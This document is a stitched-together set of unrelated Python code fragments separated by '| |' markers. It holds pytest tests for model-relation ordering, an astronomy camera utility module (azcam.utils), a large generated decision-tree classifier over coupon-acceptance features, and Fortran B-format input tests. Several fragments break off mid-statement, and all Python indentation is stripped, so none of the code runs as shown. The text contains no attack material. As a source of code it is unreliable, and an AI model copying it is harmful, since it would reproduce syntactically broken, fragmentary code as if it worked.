exp_params = [[r.model, r.fieldname, r.target_model] for r in exp_objs]
res_params = [[r.model, r.fieldname, r.target_model] for r in result]
assert res_params == exp_params
@pytest.mark.relation
@pytest.mark.parametrize('relation', [
'ReferenceNode to OneToOneNode',
'ReferenceNode to SelfReferentialNode',
'OneToOneNode to ReferenceNode',
'EndNode to ReferenceNode'
], ids=[
'direct 1-1',
'direct foreign-key',
'indirect 1-1',
'indirect 1-many'
], indirect=['relation'])
def test_relation_getasthroughrelations_not_m2m_returns_error(relation):
"""
Relation.get_as_through_relations should raise a BadRelation error
if the relation is not an m2m relation.
"""
with pytest.raises(relationtrees.BadRelation):
relation.get_as_through_relations()
@pytest.mark.relation
@pytest.mark.parametrize('relation, models, result', [
('ReferenceNode to OneToOneNode', None,
[m.OneToOneNode, m.ReferenceNode]),
('OneToOneNode to ReferenceNode', None,
[m.OneToOneNode, m.ReferenceNode]),
('ReferenceNode to SelfReferentialNode', None,
[m.SelfReferentialNode, m.ReferenceNode]),
('SelfReferentialNode to ReferenceNode', None,
[m.SelfReferentialNode, m.ReferenceNode]),
('ReferenceNode to ManyToManyNode', None,
[m.ManyToManyNode, m.ReferenceNode]),
('ManyToManyNode to ReferenceNode', None,
[m.ManyToManyNode, m.ReferenceNode]),
('ReferenceNode to SelfReferentialNode', [],
[m.SelfReferentialNode, m.ReferenceNode]),
('ReferenceNode to SelfReferentialNode',
[m.SelfReferentialNode],
[m.SelfReferentialNode, m.ReferenceNode]),
('ReferenceNode to SelfReferentialNode',
[m.ReferenceNode],
[m.SelfReferentialNode, m.ReferenceNode]),
('ReferenceNode to SelfReferentialNode',
[m.ReferenceNode, m.SelfReferentialNode],
[m.SelfReferentialNode, m.ReferenceNode]),
('ReferenceNode to SelfReferentialNode',
[m.SelfReferentialNode, m.ReferenceNode],
[m.SelfReferentialNode, m.ReferenceNode]),
('ReferenceNode to SelfReferentialNode',
[m.EndNode, m.ReferenceNode, m.SelfReferentialNode],
[m.EndNode, m.SelfReferentialNode, m.ReferenceNode]),
('ReferenceNode to SelfReferentialNode',
[m.ReferenceNode, m.EndNode, m.SelfReferentialNode],
[m.SelfReferentialNode, m.ReferenceNode, m.EndNode]),
('ReferenceNode to SelfReferentialNode',
[m.ReferenceNode, m.SelfReferentialNode, m.EndNode],
[m.SelfReferentialNode, m.ReferenceNode, m.EndNode]),
], ids=[
'direct 1-1; second (indirect) should be first',
'indirect 1-1; first (indirect) should be first',
'direct fk, 1-many; second (many) should be first',
'indirect many-1; first (many) should be first',
'direct m2m; second should be first',
'indirect m2m; first should be first',
'models list is empty',
'first model is in models list and second is not',
'second model is in models list and first is not',
'both models (only) are in models list, out of order',
'both models (only) are in models list, in order',
'multiple models, non-relevant model is before first and second',
'multiple models, non-relevant model is between first and second',
'multiple models, non-relevant model is after first and second',
],
indirect=['relation'])
def test_relation_arrangemodels_order(relation, models, result):
"""
Relation.arrange_models should return models in dependency order,
optionally utilizing a supplied "models" list.
"""
assert relation.arrange_models(models) == result
@pytest.mark.relation
@pytest.mark.parametrize('relation, source, result', [
('ReferenceNode to EndNode', [], []),
('ReferenceNode to OneToOneNode', ['ref2'], []),
('OneToOneNode to ReferenceNode', ['one2'], []),
('SelfReferentialNode to EndNode', ['srn1'], []),
('EndNode to ReferenceNode', ['end1'], []),
('ReferenceNode to OneToOneNode', ['ref0'], ['one0']),
('OneToOneNode to ReferenceNode', ['one1'], ['ref1']),
('ReferenceNode to EndNode', ['ref0'], ['end0']),
('ReferenceNode to EndNode', ['ref0', 'ref1'], ['end0', 'end2']),
('EndNode to ReferenceNode', ['end0'], ['ref0']),
('EndNode to | |
"""
*azcam.utils* contains general purpose support commands used throughout azcam.
"""
import os
import shlex
import sys
import tkinter
import tkinter.filedialog
# keyboard checking is optional
try:
import msvcrt
except Exception:
pass
import azcam
def curdir(folder: str = "") -> str:
"""
Gets and sets the working folder.
If folder is not specified then just return the current working folder.
Args:
folder: name of folder set.
Returns:
the current folder (after changing).
"""
if folder is None:
return
if folder != "":
folder = folder.lstrip('"').rstrip('"')
try:
os.chdir(folder)
except FileNotFoundError:
pass
reply = os.getcwd()
reply = reply.replace("\\", "/")
azcam.db.wd = reply # save result
return reply
def fix_path(path: str = "", no_drive_letter: bool = 1) -> str:
"""
Makes a nice absolute path, leaving only forward slashes.
Args:
path: name of path to cleanup.
bool no_drive_letter: Removes leading drive letter.
Returns:
cleaned path name.
"""
norm = os.path.abspath(os.path.normpath(path))
pth = norm.replace("\\", "/") # go to forward slashes only
if no_drive_letter and len(pth) > 2 and pth[1] == ":":
pth = pth[2:]
return pth
def add_searchfolder(search_folder: str = "", include_subfolders: bool = True) -> None:
"""
Appends search_folder (and by default all its subfolders) to the current python search path.
Default is current folder and its subfolders.
Subfolders beginning with "_" are not included.
Args:
search_folder: Name of folder to add to sys.path
include_subfolders: True to include all subfolders in sys.path
"""
if search_folder == "":
search_folder = curdir()
search_folder = azcam.utils.fix_path(search_folder)
# append all subfolders of search_folder to current search path
if search_folder not in sys.path:
sys.path.append(search_folder)
if include_subfolders:
for root, dirs, _ in os.walk(search_folder):
if dirs:
for s in dirs:
if s.startswith("_"):
continue
sub = os.path.join(root, s)
sub = azcam.utils.fix_path(sub)
if sub not in sys.path:
sys.path.append(sub)
return
def make_image_filename(imagefile: str) -> str:
"""
Returns the absolute file imagefile, with forward slashes.
Appends ".fits" if no extension is included.
Args:
imagefile: image filename to be expanded
Returns:
expanded image filename.
"""
if imagefile.endswith(".fits"):
pass
elif imagefile.endswith(".fit"):
pass
elif not imagefile.endswith(".bin"):
imagefile += ".fits"
return fix_path(imagefile)
def parse(string: str, set_type=0) -> list[str]:
"""
Parse a string into tokens using the standard azcam rules.
If setType is true, try and set data data type for each token.
Args:
string: String to be parsed into tokens
set_type: True to try and set the type of each token ("1" to 1)
Returns:
list of parsed tokens
"""
# allow for quotes
lex = shlex.shlex(string)
lex.quotes = "\"'"
lex.whitespace_split = True
lex.commenters = "#"
toks = list(lex)
# remove bounding quotes unless quoting a number (leave as string)
tokens = []
for tok in toks:
if tok.startswith('"') and tok.endswith('"'):
tok1 = tok[1:-1]
t, value = get_datatype(tok1)
if t not in ["int", "float"]:
tok = tok1
elif tok.startswith("'") and tok.endswith("'"):
tok1 = tok[1:-1]
t, value = get_datatype(tok1)
if t not in ["int", "float"]:
tok = tok1
tokens.append(tok)
if set_type:
for i, tok in enumerate(tokens):
t, value = get_datatype(tok)
tokens[i] = value
return tokens
def get_datatype(value) -> list:
"""
Determine the data type for an object and set the type if possible. A string such as "1.23"
will result in a type "float" and "2" will result in type "int".
Args:
value: object to be typed
Returns:
list [type, value] of data type as a code and object with that type
"""
if type(value) is str:
# string integer
if value.isdigit():
attributetype = "int"
value = int(value)
return [attributetype, value]
else:
try:
value = float(value)
attributetype = "float"
return [attributetype, value]
except ValueError:
pass
attributetype = "str"
elif type(value) is int:
attributetype = "int"
value = int(value)
elif type(value) is float:
attributetype = "float"
value = float(value)
# more work here
else:
attributetype = "str"
return [attributetype, value]
def prompt(prompt_message: str = "Enter a string", default: str = "") -> str:
"""
Prints a message and waits for user input.
Args:
prompt_message: string to be printed
default: string to be returned if no value is entered
Returns:
string entered or default value
"""
default = str(default)
try:
if default != "":
in1 = input(prompt_message + " [" + default + "]: ")
else:
in1 = input(prompt_message + ": ")
except KeyboardInterrupt:
return ""
if in1 == "":
return default
else:
return in1
def check_keyboard(wait: bool = False) -> str:
"""
Checks keyboard for a key press.
For Windows OS only.
Args:
wait: True to wait until a key is pressed
Returns:
key which was pressed or empty string.
"""
# TODO: map sequences like 'F1'
if os.name != "nt":
raise azcam.AzcamError("check_keyboard not supported on this OS")
loop = 1
key = ""
while loop:
if msvcrt.kbhit():
key = msvcrt.getch()
try:
key = key.decode()
# since the key is byte type, maybe escape sequence so check for more
# if msvcrt.kbhit():
# key1 = msvcrt.getch()
# # key = key + key1.decode()
except UnicodeDecodeError:
pass
break
if not wait:
loop = 0
return key
def show_menu(configs: dict) -> str:
"""
Interative: Show a menu and wait for selection.
"blank" may be used to display an empty line.
print() is allowed here as this is for interactive use only.
Args:
configs: Dictionary of strings which are menu items
Returns:
string associated with item selected or empty string.
"""
if len(configs) == 1:
choice = configs[list(configs.keys())[0]]
return choice
CONFIRMED = 0
choice = ""
while not CONFIRMED:
print("Select configuration number from list below:\n")
i = 0
for c in configs:
if c == "blank":
print("")
else:
i += 1
print("%1d.....%s" % (i, c))
print("")
print("Enter configuration number: ", end="")
choiceindex = input()
if choiceindex == "q":
azcam.AzcamWarning("Quit detected")
return
try:
choiceindex = int(choiceindex)
except ValueError:
print("Bad keyboard input...try again\n")
continue
choiceindex = int(choiceindex)
choiceindex = choiceindex - 1 # zero based
# remove blanks
for x in configs:
if x == "blank":
configs.remove("blank")
if choiceindex < 0 or choiceindex > len(configs) - 1:
print("invalid selection - %d\n" % (choiceindex + 1))
continue
# get choice
configlist = list(configs.keys()) # is order OK?
choice = configs[configlist[choiceindex]]
CONFIRMED = 1
print("")
return choice
def get_image_roi() -> list:
"""
Get the data and noise regions of interest in image image coordinates.
Check for ROI's in the following order:
- azcam.db.imageroi if defined
- display.roi if defined
Returns:
list of ROIs
"""
# database roi
if azcam.db.get("imageroi"):
if azcam.db.imageroi != []:
return azcam.db.imageroi
# display.roi
roi = []
try:
reply = azcam.db.display.get_rois(0, "image")
except AttributeError:
raise azcam.AzcamError("cannot get ROI - display not found")
roi.append(reply)
reply = azcam.db.display.get_rois(1, "image")
if reply:
roi.append(reply)
else:
roi.append(roi[0])
return roi
def set_image_roi(roi: list = []) -> None:
"""
Set the global image region of interest "db.imageroi".
If roi is not specified, use display ROI.
Args:
roi: ROI list or []
"""
# set directly with given value
if roi != []:
azcam.db.imageroi = roi
return
# use display ROIs
roi = []
try:
reply = azcam.db.display.get_rois(-1, "image")
except AttributeError:
raise azcam.AzcamError("cannot set ROI - no display found")
if not reply:
raise azcam.AzcamError("could not get display ROI")
azcam.db.imageroi = reply
return
def file_browser(Path: str = "", SelectString: str = "*.*", Label: str = "") -> list:
"""
Filebrowser GUI to select files. This is the tcl/tk version.
Args:
Path: Starting path for selection.
SelectString: Selection string like [('all files',('*.*'))] for filtering file names or *folder* to select folders.
Label: Dialog box label.
Returns:
list of selected files/folders or None
"""
tkinter.Tk().withdraw() # we don't want a full GUI, so keep the root window from appearing
options = {}
if Path != "":
options["initialdir"] = Path if os.path.isdir(Path) else os.path.dirname(Path)
else:
options["initialdir"] = ""
if SelectString == "folder":
options["mustexist"] = True
options["title"] = "Select folder" if Label == "" else Label
folder = tkinter.filedialog.askdirectory(**options)
if folder is None:
return
if folder == "":
folder = None
return folder
else:
options["title"] = "Select file(s)" if Label == "" else Label
options["multiple"] = True
# get filetypes string
if SelectString == "*.*":
options["filetypes"] = [("all files", "*.*")]
| |
"metric_value": 0.0, "depth": 11}
if obj[10]<=0:
return 'True'
elif obj[10]>0:
return 'False'
else: return 'False'
elif obj[4]<=3:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[10]>0:
return 'True'
elif obj[10]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]>2:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[6]<=1.348010951701891:
# {"feature": "Coffeehouse", "instances": 82, "metric_value": 0.2475, "depth": 6}
if obj[8]<=2.0:
# {"feature": "Restaurant20to50", "instances": 74, "metric_value": 0.194, "depth": 7}
if obj[9]<=1.0:
# {"feature": "Age", "instances": 67, "metric_value": 0.1562, "depth": 8}
if obj[4]>1:
# {"feature": "Time", "instances": 47, "metric_value": 0.2197, "depth": 9}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 43, "metric_value": 0.2377, "depth": 10}
if obj[10]<=0:
# {"feature": "Gender", "instances": 31, "metric_value": 0.2615, "depth": 11}
if obj[3]>0:
# {"feature": "Distance", "instances": 24, "metric_value": 0.2, "depth": 12}
if obj[11]<=2:
return 'False'
elif obj[11]>2:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.4048, "depth": 12}
if obj[11]>1:
return 'False'
elif obj[11]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>0:
# {"feature": "Distance", "instances": 12, "metric_value": 0.1333, "depth": 11}
if obj[11]<=1:
return 'False'
elif obj[11]>1:
# {"feature": "Gender", "instances": 5, "metric_value": 0.3, "depth": 12}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
return 'False'
else: return 'False'
elif obj[4]<=1:
return 'False'
else: return 'False'
elif obj[9]>1.0:
# {"feature": "Gender", "instances": 7, "metric_value": 0.0, "depth": 8}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Time", "instances": 8, "metric_value": 0.1667, "depth": 7}
if obj[1]<=1:
return 'True'
elif obj[1]>1:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 8}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[0]>2:
# {"feature": "Age", "instances": 219, "metric_value": 0.4854, "depth": 4}
if obj[4]>2:
# {"feature": "Restaurant20to50", "instances": 123, "metric_value": 0.4675, "depth": 5}
if obj[9]<=1.0:
# {"feature": "Occupation", "instances": 86, "metric_value": 0.4791, "depth": 6}
if obj[6]>0:
# {"feature": "Education", "instances": 83, "metric_value": 0.4877, "depth": 7}
if obj[5]<=2:
# {"feature": "Time", "instances": 64, "metric_value": 0.4763, "depth": 8}
if obj[1]>0:
# {"feature": "Distance", "instances": 62, "metric_value": 0.486, "depth": 9}
if obj[11]>1:
# {"feature": "Coffeehouse", "instances": 49, "metric_value": 0.4694, "depth": 10}
if obj[8]>0.0:
# {"feature": "Gender", "instances": 27, "metric_value": 0.4242, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.375, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.4959, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[8]<=0.0:
# {"feature": "Gender", "instances": 22, "metric_value": 0.381, "depth": 11}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2449, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[11]<=1:
# {"feature": "Coffeehouse", "instances": 13, "metric_value": 0.3916, "depth": 10}
if obj[8]<=2.0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.4416, "depth": 11}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4082, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[5]>2:
# {"feature": "Time", "instances": 19, "metric_value": 0.4087, "depth": 8}
if obj[1]<=3:
# {"feature": "Coffeehouse", "instances": 17, "metric_value": 0.3494, "depth": 9}
if obj[8]<=2.0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.2803, "depth": 10}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.2188, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 8, "metric_value": 0.2188, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4, "depth": 10}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[11]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
return 'False'
else: return 'False'
else: return 'True'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[9]>1.0:
# {"feature": "Education", "instances": 37, "metric_value": 0.3326, "depth": 6}
if obj[5]>0:
# {"feature": "Coffeehouse", "instances": 26, "metric_value": 0.4431, "depth": 7}
if obj[8]>-1.0:
# {"feature": "Time", "instances": 25, "metric_value": 0.4383, "depth": 8}
if obj[1]<=3:
# {"feature": "Occupation", "instances": 23, "metric_value": 0.456, "depth": 9}
if obj[6]<=9:
# {"feature": "Gender", "instances": 18, "metric_value": 0.4938, "depth": 10}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4938, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.4938, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4938, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.4938, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>9:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[8]<=-1.0:
return 'False'
else: return 'False'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=2:
# {"feature": "Education", "instances": 96, "metric_value": 0.4495, "depth": 5}
if obj[5]<=2:
# {"feature": "Restaurant20to50", "instances": 76, "metric_value": 0.4171, "depth": 6}
if obj[9]>-1.0:
# {"feature": "Time", "instances": 74, "metric_value": 0.4109, "depth": 7}
if obj[1]>2:
# {"feature": "Coffeehouse", "instances": 52, "metric_value": 0.3537, "depth": 8}
if obj[8]<=3.0:
# {"feature": "Occupation", "instances": 49, "metric_value": 0.3231, "depth": 9}
if obj[6]<=21:
# {"feature": "Gender", "instances": 48, "metric_value": 0.3241, "depth": 10}
if obj[3]>0:
# {"feature": "Distance", "instances": 30, "metric_value": 0.2716, "depth": 11}
if obj[11]>1:
# {"feature": "Direction_same", "instances": 27, "metric_value": 0.3018, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[11]<=1:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Distance", "instances": 18, "metric_value": 0.4, "depth": 11}
if obj[11]>1:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.3911, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[11]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>21:
return 'True'
else: return 'True'
elif obj[8]>3.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 9}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=2:
# {"feature": "Coffeehouse", "instances": 22, "metric_value": 0.4306, "depth": 8}
if obj[8]<=2.0:
# {"feature": "Occupation", "instances": 19, "metric_value": 0.4451, "depth": 9}
if obj[6]<=12:
# {"feature": "Gender", "instances": 14, "metric_value": 0.4898, "depth": 10}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4898, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.4898, "depth": 12}
if obj[11]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4898, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.4898, "depth": 12}
if obj[11]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>12:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]<=-1.0:
return 'True'
else: return 'True'
elif obj[5]>2:
# {"feature": "Coffeehouse", "instances": 20, "metric_value": 0.4, "depth": 6}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 18, "metric_value": 0.3922, "depth": 7}
if obj[9]>-1.0:
# {"feature": "Occupation", "instances": 17, "metric_value": 0.3644, "depth": 8}
if obj[6]<=6:
# {"feature": "Time", "instances": 9, "metric_value": 0.4815, "depth": 9}
if obj[1]>2:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4, "depth": 10}
if obj[3]<=0:
# {"feature": "Distance", "instances": 5, "metric_value": 0.4667, "depth": 11}
if obj[11]>1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[11]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[1]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>6:
# {"feature": "Time", "instances": 8, "metric_value": 0.125, "depth": 9}
if obj[1]>2:
return 'True'
elif obj[1]<=2:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[9]<=-1.0:
return 'False'
else: return 'False'
elif obj[8]>3.0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[7]>1.0:
# {"feature": "Restaurant20to50", "instances": 662, "metric_value": 0.4594, "depth": 3}
if obj[9]<=1.0:
# {"feature": "Passanger", "instances": 355, "metric_value": 0.4904, "depth": 4}
if obj[0]<=2:
# {"feature": "Time", "instances": 290, "metric_value": 0.4838, "depth": 5}
if obj[1]<=2:
# {"feature": "Occupation", "instances": 202, "metric_value": 0.4801, "depth": 6}
if obj[6]<=13.60630442015693:
# {"feature": "Gender", "instances": 170, "metric_value": 0.4739, "depth": 7}
if obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 102, "metric_value": 0.4471, "depth": 8}
if obj[8]>1.0:
# {"feature": "Distance", "instances": 61, "metric_value": 0.4486, "depth": 9}
if obj[11]<=2:
# {"feature": "Direction_same", "instances": 45, "metric_value": 0.4864, "depth": 10}
if obj[10]<=0:
# {"feature": "Education", "instances": 27, "metric_value": 0.4167, "depth": 11}
if obj[5]<=2:
# {"feature": "Age", "instances": 24, "metric_value": 0.4348, "depth": 12}
if obj[4]>0:
return 'False'
elif obj[4]<=0:
return 'True'
else: return 'True'
elif obj[5]>2:
return 'True'
else: return 'True'
elif obj[10]>0:
# {"feature": "Age", "instances": 18, "metric_value": 0.4314, "depth": 11}
if obj[4]>0:
# {"feature": "Education", "instances": 17, "metric_value": 0.4044, "depth": 12}
if obj[5]<=3:
return 'True'
elif obj[5]>3:
return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[11]>2:
# {"feature": "Age", "instances": 16, "metric_value": 0.2768, "depth": 10}
if obj[4]<=4:
# {"feature": "Education", "instances": 14, "metric_value": 0.2286, "depth": 11}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.32, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return | |
inp = '''-10000'''
fmt = '''(B10.5)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_898(self):
inp = '''100000'''
fmt = '''(B10.5)'''
result = [32]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_899(self):
inp = '''-100000'''
fmt = '''(B10.5)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_900(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(B10.5)'''
result = [66]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_901(self):
inp = '''10101000'''
fmt = '''(B10.5)'''
result = [168]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_902(self):
inp = '''0'''
fmt = '''(1B1)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_903(self):
inp = '''-0'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_904(self):
inp = '''1'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_905(self):
inp = '''-1'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_906(self):
inp = '''2'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_907(self):
inp = '''10'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_908(self):
inp = '''-10'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_909(self):
inp = '''100'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_910(self):
inp = '''-100'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_911(self):
inp = '''1000'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_912(self):
inp = '''-1000'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_913(self):
inp = '''10000'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_914(self):
inp = '''-10000'''
